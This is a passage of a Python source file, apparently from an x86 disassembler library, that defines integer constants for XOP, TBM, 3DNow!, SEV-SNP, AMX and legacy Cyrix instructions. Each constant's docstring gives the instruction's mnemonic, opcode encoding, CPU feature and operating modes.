``XOP.256.X8.W0 A2 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPCMOV_XMM_XMM_XMM_XMMM128: int = 4086
"""
``VPCMOV xmm1, xmm2, xmm3, xmm4/m128``
``XOP.128.X8.W1 A2 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPCMOV_YMM_YMM_YMM_YMMM256: int = 4087
"""
``VPCMOV ymm1, ymm2, ymm3, ymm4/m256``
``XOP.256.X8.W1 A2 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPPERM_XMM_XMM_XMMM128_XMM: int = 4088
"""
``VPPERM xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 A3 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPPERM_XMM_XMM_XMM_XMMM128: int = 4089
"""
``VPPERM xmm1, xmm2, xmm3, xmm4/m128``
``XOP.128.X8.W1 A3 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMADCSSWD_XMM_XMM_XMMM128_XMM: int = 4090
"""
``VPMADCSSWD xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 A6 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMADCSWD_XMM_XMM_XMMM128_XMM: int = 4091
"""
``VPMADCSWD xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 B6 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTB_XMM_XMMM128_IMM8: int = 4092
"""
``VPROTB xmm1, xmm2/m128, imm8``
``XOP.128.X8.W0 C0 /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTW_XMM_XMMM128_IMM8: int = 4093
"""
``VPROTW xmm1, xmm2/m128, imm8``
``XOP.128.X8.W0 C1 /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTD_XMM_XMMM128_IMM8: int = 4094
"""
``VPROTD xmm1, xmm2/m128, imm8``
``XOP.128.X8.W0 C2 /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTQ_XMM_XMMM128_IMM8: int = 4095
"""
``VPROTQ xmm1, xmm2/m128, imm8``
``XOP.128.X8.W0 C3 /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPCOMB_XMM_XMM_XMMM128_IMM8: int = 4096
"""
``VPCOMB xmm1, xmm2, xmm3/m128, imm8``
``XOP.128.X8.W0 CC /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPCOMW_XMM_XMM_XMMM128_IMM8: int = 4097
"""
``VPCOMW xmm1, xmm2, xmm3/m128, imm8``
``XOP.128.X8.W0 CD /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPCOMD_XMM_XMM_XMMM128_IMM8: int = 4098
"""
``VPCOMD xmm1, xmm2, xmm3/m128, imm8``
``XOP.128.X8.W0 CE /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPCOMQ_XMM_XMM_XMMM128_IMM8: int = 4099
"""
``VPCOMQ xmm1, xmm2, xmm3/m128, imm8``
``XOP.128.X8.W0 CF /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPCOMUB_XMM_XMM_XMMM128_IMM8: int = 4100
"""
``VPCOMUB xmm1, xmm2, xmm3/m128, imm8``
``XOP.128.X8.W0 EC /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPCOMUW_XMM_XMM_XMMM128_IMM8: int = 4101
"""
``VPCOMUW xmm1, xmm2, xmm3/m128, imm8``
``XOP.128.X8.W0 ED /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPCOMUD_XMM_XMM_XMMM128_IMM8: int = 4102
"""
``VPCOMUD xmm1, xmm2, xmm3/m128, imm8``
``XOP.128.X8.W0 EE /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPCOMUQ_XMM_XMM_XMMM128_IMM8: int = 4103
"""
``VPCOMUQ xmm1, xmm2, xmm3/m128, imm8``
``XOP.128.X8.W0 EF /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_BLCFILL_R32_RM32: int = 4104
"""
``BLCFILL r32, r/m32``
``XOP.L0.X9.W0 01 /1``
``TBM``
``16/32/64-bit``
"""
XOP_BLCFILL_R64_RM64: int = 4105
"""
``BLCFILL r64, r/m64``
``XOP.L0.X9.W1 01 /1``
``TBM``
``64-bit``
"""
XOP_BLSFILL_R32_RM32: int = 4106
"""
``BLSFILL r32, r/m32``
``XOP.L0.X9.W0 01 /2``
``TBM``
``16/32/64-bit``
"""
XOP_BLSFILL_R64_RM64: int = 4107
"""
``BLSFILL r64, r/m64``
``XOP.L0.X9.W1 01 /2``
``TBM``
``64-bit``
"""
XOP_BLCS_R32_RM32: int = 4108
"""
``BLCS r32, r/m32``
``XOP.L0.X9.W0 01 /3``
``TBM``
``16/32/64-bit``
"""
XOP_BLCS_R64_RM64: int = 4109
"""
``BLCS r64, r/m64``
``XOP.L0.X9.W1 01 /3``
``TBM``
``64-bit``
"""
XOP_TZMSK_R32_RM32: int = 4110
"""
``TZMSK r32, r/m32``
``XOP.L0.X9.W0 01 /4``
``TBM``
``16/32/64-bit``
"""
XOP_TZMSK_R64_RM64: int = 4111
"""
``TZMSK r64, r/m64``
``XOP.L0.X9.W1 01 /4``
``TBM``
``64-bit``
"""
XOP_BLCIC_R32_RM32: int = 4112
"""
``BLCIC r32, r/m32``
``XOP.L0.X9.W0 01 /5``
``TBM``
``16/32/64-bit``
"""
XOP_BLCIC_R64_RM64: int = 4113
"""
``BLCIC r64, r/m64``
``XOP.L0.X9.W1 01 /5``
``TBM``
``64-bit``
"""
XOP_BLSIC_R32_RM32: int = 4114
"""
``BLSIC r32, r/m32``
``XOP.L0.X9.W0 01 /6``
``TBM``
``16/32/64-bit``
"""
XOP_BLSIC_R64_RM64: int = 4115
"""
``BLSIC r64, r/m64``
``XOP.L0.X9.W1 01 /6``
``TBM``
``64-bit``
"""
XOP_T1MSKC_R32_RM32: int = 4116
"""
``T1MSKC r32, r/m32``
``XOP.L0.X9.W0 01 /7``
``TBM``
``16/32/64-bit``
"""
XOP_T1MSKC_R64_RM64: int = 4117
"""
``T1MSKC r64, r/m64``
``XOP.L0.X9.W1 01 /7``
``TBM``
``64-bit``
"""
XOP_BLCMSK_R32_RM32: int = 4118
"""
``BLCMSK r32, r/m32``
``XOP.L0.X9.W0 02 /1``
``TBM``
``16/32/64-bit``
"""
XOP_BLCMSK_R64_RM64: int = 4119
"""
``BLCMSK r64, r/m64``
``XOP.L0.X9.W1 02 /1``
``TBM``
``64-bit``
"""
XOP_BLCI_R32_RM32: int = 4120
"""
``BLCI r32, r/m32``
``XOP.L0.X9.W0 02 /6``
``TBM``
``16/32/64-bit``
"""
XOP_BLCI_R64_RM64: int = 4121
"""
``BLCI r64, r/m64``
``XOP.L0.X9.W1 02 /6``
``TBM``
``64-bit``
"""
XOP_LLWPCB_R32: int = 4122
"""
``LLWPCB r32``
``XOP.L0.X9.W0 12 /0``
``LWP``
``16/32/64-bit``
"""
XOP_LLWPCB_R64: int = 4123
"""
``LLWPCB r64``
``XOP.L0.X9.W1 12 /0``
``LWP``
``64-bit``
"""
XOP_SLWPCB_R32: int = 4124
"""
``SLWPCB r32``
``XOP.L0.X9.W0 12 /1``
``LWP``
``16/32/64-bit``
"""
XOP_SLWPCB_R64: int = 4125
"""
``SLWPCB r64``
``XOP.L0.X9.W1 12 /1``
``LWP``
``64-bit``
"""
XOP_VFRCZPS_XMM_XMMM128: int = 4126
"""
``VFRCZPS xmm1, xmm2/m128``
``XOP.128.X9.W0 80 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VFRCZPS_YMM_YMMM256: int = 4127
"""
``VFRCZPS ymm1, ymm2/m256``
``XOP.256.X9.W0 80 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VFRCZPD_XMM_XMMM128: int = 4128
"""
``VFRCZPD xmm1, xmm2/m128``
``XOP.128.X9.W0 81 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VFRCZPD_YMM_YMMM256: int = 4129
"""
``VFRCZPD ymm1, ymm2/m256``
``XOP.256.X9.W0 81 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VFRCZSS_XMM_XMMM32: int = 4130
"""
``VFRCZSS xmm1, xmm2/m32``
``XOP.128.X9.W0 82 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VFRCZSD_XMM_XMMM64: int = 4131
"""
``VFRCZSD xmm1, xmm2/m64``
``XOP.128.X9.W0 83 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTB_XMM_XMMM128_XMM: int = 4132
"""
``VPROTB xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 90 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTB_XMM_XMM_XMMM128: int = 4133
"""
``VPROTB xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 90 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTW_XMM_XMMM128_XMM: int = 4134
"""
``VPROTW xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 91 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTW_XMM_XMM_XMMM128: int = 4135
"""
``VPROTW xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 91 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTD_XMM_XMMM128_XMM: int = 4136
"""
``VPROTD xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 92 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTD_XMM_XMM_XMMM128: int = 4137
"""
``VPROTD xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 92 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTQ_XMM_XMMM128_XMM: int = 4138
"""
``VPROTQ xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 93 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTQ_XMM_XMM_XMMM128: int = 4139
"""
``VPROTQ xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 93 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHLB_XMM_XMMM128_XMM: int = 4140
"""
``VPSHLB xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 94 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHLB_XMM_XMM_XMMM128: int = 4141
"""
``VPSHLB xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 94 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHLW_XMM_XMMM128_XMM: int = 4142
"""
``VPSHLW xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 95 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHLW_XMM_XMM_XMMM128: int = 4143
"""
``VPSHLW xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 95 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHLD_XMM_XMMM128_XMM: int = 4144
"""
``VPSHLD xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 96 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHLD_XMM_XMM_XMMM128: int = 4145
"""
``VPSHLD xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 96 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHLQ_XMM_XMMM128_XMM: int = 4146
"""
``VPSHLQ xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 97 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHLQ_XMM_XMM_XMMM128: int = 4147
"""
``VPSHLQ xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 97 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHAB_XMM_XMMM128_XMM: int = 4148
"""
``VPSHAB xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 98 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHAB_XMM_XMM_XMMM128: int = 4149
"""
``VPSHAB xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 98 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHAW_XMM_XMMM128_XMM: int = 4150
"""
``VPSHAW xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 99 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHAW_XMM_XMM_XMMM128: int = 4151
"""
``VPSHAW xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 99 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHAD_XMM_XMMM128_XMM: int = 4152
"""
``VPSHAD xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 9A /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHAD_XMM_XMM_XMMM128: int = 4153
"""
``VPSHAD xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 9A /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHAQ_XMM_XMMM128_XMM: int = 4154
"""
``VPSHAQ xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 9B /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHAQ_XMM_XMM_XMMM128: int = 4155
"""
``VPSHAQ xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 9B /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDBW_XMM_XMMM128: int = 4156
"""
``VPHADDBW xmm1, xmm2/m128``
``XOP.128.X9.W0 C1 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDBD_XMM_XMMM128: int = 4157
"""
``VPHADDBD xmm1, xmm2/m128``
``XOP.128.X9.W0 C2 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDBQ_XMM_XMMM128: int = 4158
"""
``VPHADDBQ xmm1, xmm2/m128``
``XOP.128.X9.W0 C3 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDWD_XMM_XMMM128: int = 4159
"""
``VPHADDWD xmm1, xmm2/m128``
``XOP.128.X9.W0 C6 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDWQ_XMM_XMMM128: int = 4160
"""
``VPHADDWQ xmm1, xmm2/m128``
``XOP.128.X9.W0 C7 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDDQ_XMM_XMMM128: int = 4161
"""
``VPHADDDQ xmm1, xmm2/m128``
``XOP.128.X9.W0 CB /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDUBW_XMM_XMMM128: int = 4162
"""
``VPHADDUBW xmm1, xmm2/m128``
``XOP.128.X9.W0 D1 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDUBD_XMM_XMMM128: int = 4163
"""
``VPHADDUBD xmm1, xmm2/m128``
``XOP.128.X9.W0 D2 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDUBQ_XMM_XMMM128: int = 4164
"""
``VPHADDUBQ xmm1, xmm2/m128``
``XOP.128.X9.W0 D3 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDUWD_XMM_XMMM128: int = 4165
"""
``VPHADDUWD xmm1, xmm2/m128``
``XOP.128.X9.W0 D6 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDUWQ_XMM_XMMM128: int = 4166
"""
``VPHADDUWQ xmm1, xmm2/m128``
``XOP.128.X9.W0 D7 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDUDQ_XMM_XMMM128: int = 4167
"""
``VPHADDUDQ xmm1, xmm2/m128``
``XOP.128.X9.W0 DB /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHSUBBW_XMM_XMMM128: int = 4168
"""
``VPHSUBBW xmm1, xmm2/m128``
``XOP.128.X9.W0 E1 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHSUBWD_XMM_XMMM128: int = 4169
"""
``VPHSUBWD xmm1, xmm2/m128``
``XOP.128.X9.W0 E2 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHSUBDQ_XMM_XMMM128: int = 4170
"""
``VPHSUBDQ xmm1, xmm2/m128``
``XOP.128.X9.W0 E3 /r``
``XOP``
``16/32/64-bit``
"""
XOP_BEXTR_R32_RM32_IMM32: int = 4171
"""
``BEXTR r32, r/m32, imm32``
``XOP.L0.XA.W0 10 /r id``
``TBM``
``16/32/64-bit``
"""
XOP_BEXTR_R64_RM64_IMM32: int = 4172
"""
``BEXTR r64, r/m64, imm32``
``XOP.L0.XA.W1 10 /r id``
``TBM``
``64-bit``
"""
XOP_LWPINS_R32_RM32_IMM32: int = 4173
"""
``LWPINS r32, r/m32, imm32``
``XOP.L0.XA.W0 12 /0 id``
``LWP``
``16/32/64-bit``
"""
XOP_LWPINS_R64_RM32_IMM32: int = 4174
"""
``LWPINS r64, r/m32, imm32``
``XOP.L0.XA.W1 12 /0 id``
``LWP``
``64-bit``
"""
XOP_LWPVAL_R32_RM32_IMM32: int = 4175
"""
``LWPVAL r32, r/m32, imm32``
``XOP.L0.XA.W0 12 /1 id``
``LWP``
``16/32/64-bit``
"""
XOP_LWPVAL_R64_RM32_IMM32: int = 4176
"""
``LWPVAL r64, r/m32, imm32``
``XOP.L0.XA.W1 12 /1 id``
``LWP``
``64-bit``
"""
D3NOW_PI2FW_MM_MMM64: int = 4177
"""
``PI2FW mm, mm/m64``
``0F 0F /r 0C``
``3DNOWEXT``
``16/32/64-bit``
"""
D3NOW_PI2FD_MM_MMM64: int = 4178
"""
``PI2FD mm, mm/m64``
``0F 0F /r 0D``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PF2IW_MM_MMM64: int = 4179
"""
``PF2IW mm, mm/m64``
``0F 0F /r 1C``
``3DNOWEXT``
``16/32/64-bit``
"""
D3NOW_PF2ID_MM_MMM64: int = 4180
"""
``PF2ID mm, mm/m64``
``0F 0F /r 1D``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFRCPV_MM_MMM64: int = 4181
"""
``PFRCPV mm, mm/m64``
``0F 0F /r 86``
``AMD Geode GX/LX``
``16/32-bit``
"""
D3NOW_PFRSQRTV_MM_MMM64: int = 4182
"""
``PFRSQRTV mm, mm/m64``
``0F 0F /r 87``
``AMD Geode GX/LX``
``16/32-bit``
"""
D3NOW_PFNACC_MM_MMM64: int = 4183
"""
``PFNACC mm, mm/m64``
``0F 0F /r 8A``
``3DNOWEXT``
``16/32/64-bit``
"""
D3NOW_PFPNACC_MM_MMM64: int = 4184
"""
``PFPNACC mm, mm/m64``
``0F 0F /r 8E``
``3DNOWEXT``
``16/32/64-bit``
"""
D3NOW_PFCMPGE_MM_MMM64: int = 4185
"""
``PFCMPGE mm, mm/m64``
``0F 0F /r 90``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFMIN_MM_MMM64: int = 4186
"""
``PFMIN mm, mm/m64``
``0F 0F /r 94``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFRCP_MM_MMM64: int = 4187
"""
``PFRCP mm, mm/m64``
``0F 0F /r 96``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFRSQRT_MM_MMM64: int = 4188
"""
``PFRSQRT mm, mm/m64``
``0F 0F /r 97``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFSUB_MM_MMM64: int = 4189
"""
``PFSUB mm, mm/m64``
``0F 0F /r 9A``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFADD_MM_MMM64: int = 4190
"""
``PFADD mm, mm/m64``
``0F 0F /r 9E``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFCMPGT_MM_MMM64: int = 4191
"""
``PFCMPGT mm, mm/m64``
``0F 0F /r A0``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFMAX_MM_MMM64: int = 4192
"""
``PFMAX mm, mm/m64``
``0F 0F /r A4``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFRCPIT1_MM_MMM64: int = 4193
"""
``PFRCPIT1 mm, mm/m64``
``0F 0F /r A6``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFRSQIT1_MM_MMM64: int = 4194
"""
``PFRSQIT1 mm, mm/m64``
``0F 0F /r A7``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFSUBR_MM_MMM64: int = 4195
"""
``PFSUBR mm, mm/m64``
``0F 0F /r AA``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFACC_MM_MMM64: int = 4196
"""
``PFACC mm, mm/m64``
``0F 0F /r AE``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFCMPEQ_MM_MMM64: int = 4197
"""
``PFCMPEQ mm, mm/m64``
``0F 0F /r B0``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFMUL_MM_MMM64: int = 4198
"""
``PFMUL mm, mm/m64``
``0F 0F /r B4``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFRCPIT2_MM_MMM64: int = 4199
"""
``PFRCPIT2 mm, mm/m64``
``0F 0F /r B6``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PMULHRW_MM_MMM64: int = 4200
"""
``PMULHRW mm, mm/m64``
``0F 0F /r B7``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PSWAPD_MM_MMM64: int = 4201
"""
``PSWAPD mm, mm/m64``
``0F 0F /r BB``
``3DNOWEXT``
``16/32/64-bit``
"""
D3NOW_PAVGUSB_MM_MMM64: int = 4202
"""
``PAVGUSB mm, mm/m64``
``0F 0F /r BF``
``3DNOW``
``16/32/64-bit``
"""
RMPADJUST: int = 4203
"""
``RMPADJUST``
``F3 0F 01 FE``
``SEV-SNP``
``64-bit``
"""
RMPUPDATE: int = 4204
"""
``RMPUPDATE``
``F2 0F 01 FE``
``SEV-SNP``
``64-bit``
"""
PSMASH: int = 4205
"""
``PSMASH``
``F3 0F 01 FF``
``SEV-SNP``
``64-bit``
"""
PVALIDATEW: int = 4206
"""
``PVALIDATE``
``a16 F2 0F 01 FF``
``SEV-SNP``
``16/32-bit``
"""
PVALIDATED: int = 4207
"""
``PVALIDATE``
``a32 F2 0F 01 FF``
``SEV-SNP``
``16/32/64-bit``
"""
PVALIDATEQ: int = 4208
"""
``PVALIDATE``
``a64 F2 0F 01 FF``
``SEV-SNP``
``64-bit``
"""
SERIALIZE: int = 4209
"""
``SERIALIZE``
``NP 0F 01 E8``
``SERIALIZE``
``16/32/64-bit``
"""
XSUSLDTRK: int = 4210
"""
``XSUSLDTRK``
``F2 0F 01 E8``
``TSXLDTRK``
``16/32/64-bit``
"""
XRESLDTRK: int = 4211
"""
``XRESLDTRK``
``F2 0F 01 E9``
``TSXLDTRK``
``16/32/64-bit``
"""
INVLPGBW: int = 4212
"""
``INVLPGB``
``a16 NP 0F 01 FE``
``INVLPGB``
``16/32-bit``
"""
INVLPGBD: int = 4213
"""
``INVLPGB``
``a32 NP 0F 01 FE``
``INVLPGB``
``16/32/64-bit``
"""
INVLPGBQ: int = 4214
"""
``INVLPGB``
``a64 NP 0F 01 FE``
``INVLPGB``
``64-bit``
"""
TLBSYNC: int = 4215
"""
``TLBSYNC``
``NP 0F 01 FF``
``INVLPGB``
``16/32/64-bit``
"""
PREFETCHRESERVED3_M8: int = 4216
"""
``PREFETCHW m8``
``0F 0D /3``
``PREFETCHW``
``16/32/64-bit``
"""
PREFETCHRESERVED4_M8: int = 4217
"""
``PREFETCH m8``
``0F 0D /4``
``PREFETCHW``
``16/32/64-bit``
"""
PREFETCHRESERVED5_M8: int = 4218
"""
``PREFETCH m8``
``0F 0D /5``
``PREFETCHW``
``16/32/64-bit``
"""
PREFETCHRESERVED6_M8: int = 4219
"""
``PREFETCH m8``
``0F 0D /6``
``PREFETCHW``
``16/32/64-bit``
"""
PREFETCHRESERVED7_M8: int = 4220
"""
``PREFETCH m8``
``0F 0D /7``
``PREFETCHW``
``16/32/64-bit``
"""
UD0: int = 4221
"""
``UD0``
``0F FF``
``286+``
``16/32/64-bit``
"""
VMGEXIT: int = 4222
"""
``VMGEXIT``
``F3 0F 01 D9``
``SEV-ES``
``16/32/64-bit``
"""
GETSECQ: int = 4223
"""
``GETSECQ``
``NP o64 0F 37``
``SMX``
``64-bit``
"""
VEX_LDTILECFG_M512: int = 4224
"""
``LDTILECFG m512``
``VEX.128.0F38.W0 49 !(11):000:bbb``
``AMX-TILE``
``64-bit``
"""
VEX_TILERELEASE: int = 4225
"""
``TILERELEASE``
``VEX.128.0F38.W0 49 C0``
``AMX-TILE``
``64-bit``
"""
VEX_STTILECFG_M512: int = 4226
"""
``STTILECFG m512``
``VEX.128.66.0F38.W0 49 !(11):000:bbb``
``AMX-TILE``
``64-bit``
"""
VEX_TILEZERO_TMM: int = 4227
"""
``TILEZERO tmm1``
``VEX.128.F2.0F38.W0 49 11:rrr:000``
``AMX-TILE``
``64-bit``
"""
VEX_TILELOADDT1_TMM_SIBMEM: int = 4228
"""
``TILELOADDT1 tmm1, sibmem``
``VEX.128.66.0F38.W0 4B !(11):rrr:100``
``AMX-TILE``
``64-bit``
"""
VEX_TILESTORED_SIBMEM_TMM: int = 4229
"""
``TILESTORED sibmem, tmm1``
``VEX.128.F3.0F38.W0 4B !(11):rrr:100``
``AMX-TILE``
``64-bit``
"""
VEX_TILELOADD_TMM_SIBMEM: int = 4230
"""
``TILELOADD tmm1, sibmem``
``VEX.128.F2.0F38.W0 4B !(11):rrr:100``
``AMX-TILE``
``64-bit``
"""
VEX_TDPBF16PS_TMM_TMM_TMM: int = 4231
"""
``TDPBF16PS tmm1, tmm2, tmm3``
``VEX.128.F3.0F38.W0 5C 11:rrr:bbb``
``AMX-BF16``
``64-bit``
"""
VEX_TDPBUUD_TMM_TMM_TMM: int = 4232
"""
``TDPBUUD tmm1, tmm2, tmm3``
``VEX.128.0F38.W0 5E 11:rrr:bbb``
``AMX-INT8``
``64-bit``
"""
VEX_TDPBUSD_TMM_TMM_TMM: int = 4233
"""
``TDPBUSD tmm1, tmm2, tmm3``
``VEX.128.66.0F38.W0 5E 11:rrr:bbb``
``AMX-INT8``
``64-bit``
"""
VEX_TDPBSUD_TMM_TMM_TMM: int = 4234
"""
``TDPBSUD tmm1, tmm2, tmm3``
``VEX.128.F3.0F38.W0 5E 11:rrr:bbb``
``AMX-INT8``
``64-bit``
"""
VEX_TDPBSSD_TMM_TMM_TMM: int = 4235
"""
``TDPBSSD tmm1, tmm2, tmm3``
``VEX.128.F2.0F38.W0 5E 11:rrr:bbb``
``AMX-INT8``
``64-bit``
"""
FNSTDW_AX: int = 4236
"""
``FNSTDW AX``
``DF E1``
``387 SL``
``16/32-bit``
"""
FNSTSG_AX: int = 4237
"""
``FNSTSG AX``
``DF E2``
``387 SL``
``16/32-bit``
"""
RDSHR_RM32: int = 4238
"""
``RDSHR r/m32``
``0F 36 /0``
``Cyrix 6x86MX, M II, III``
``16/32-bit``
"""
WRSHR_RM32: int = 4239
"""
``WRSHR r/m32``
``0F 37 /0``
``Cyrix 6x86MX, M II, III``
``16/32-bit``
"""
SMINT: int = 4240
"""
``SMINT``
``0F 38``
``Cyrix 6x86MX+, AMD Geode GX/LX``
``16/32-bit``
"""
DMINT: int = 4241
"""
``DMINT``
``0F 39``
``AMD Geode GX/LX``
``16/32-bit``
"""
RDM: int = 4242
"""
``RDM``
``0F 3A``
``AMD Geode GX/LX``
``16/32-bit``
"""
SVDC_M80_SREG: int = 4243
"""
``SVDC m80, Sreg``
``0F 78 /r``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
RSDC_SREG_M80: int = 4244
"""
``RSDC Sreg, m80``
``0F 79 /r``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
SVLDT_M80: int = 4245
"""
``SVLDT m80``
``0F 7A /0``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
RSLDT_M80: int = 4246
"""
``RSLDT m80``
``0F 7B /0``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
SVTS_M80: int = 4247
"""
``SVTS m80``
``0F 7C /0``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
RSTS_M80: int = 4248
"""
``RSTS m80``
``0F 7D /0``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
SMINT_0F7E: int = 4249
"""
``SMINT``
``0F 7E``
``Cyrix 6x86 or earlier``
``16/32-bit``
"""
BB0_RESET: int = 4250
"""
``BB0_RESET``
``0F 3A``
``Cyrix MediaGX, GXm, GXLV, GX1``
``16/32-bit``
"""
BB1_RESET: int = 4251
"""
``BB1_RESET``
``0F 3B``
``Cyrix MediaGX, GXm, GXLV, GX1``
``16/32-bit``
"""
CPU_WRITE: int = 4252
"""
``CPU_WRITE``
``0F 3C``
``Cyrix MediaGX, GXm, GXLV, GX1``
``16/32-bit``
"""
CPU_READ: int = 4253
"""
``CPU_READ``
``0F 3D``
``Cyrix MediaGX, GXm, GXLV, GX1``
``16/32-bit``
"""
ALTINST: int = 4254
"""
``ALTINST``
``0F 3F``
``Centaur AIS``
``16/32-bit``
"""
PAVEB_MM_MMM64: int = 4255
"""
``PAVEB mm, mm/m64``
``0F 50 /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PADDSIW_MM_MMM64: int = 4256
"""
``PADDSIW mm, mm/m64``
``0F 51 /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PMAGW_MM_MMM64: int = 4257
"""
``PMAGW mm, mm/m64``
``0F 52 /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PDISTIB_MM_M64: int = 4258
"""
``PDISTIB mm, m64``
``0F 54 /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PSUBSIW_MM_MMM64: int = 4259
"""
``PSUBSIW mm, mm/m64``
``0F 55 /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PMVZB_MM_M64: int = 4260
"""
``PMVZB mm, m64``
``0F 58 /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PMULHRW_MM_MMM64: int = 4261
"""
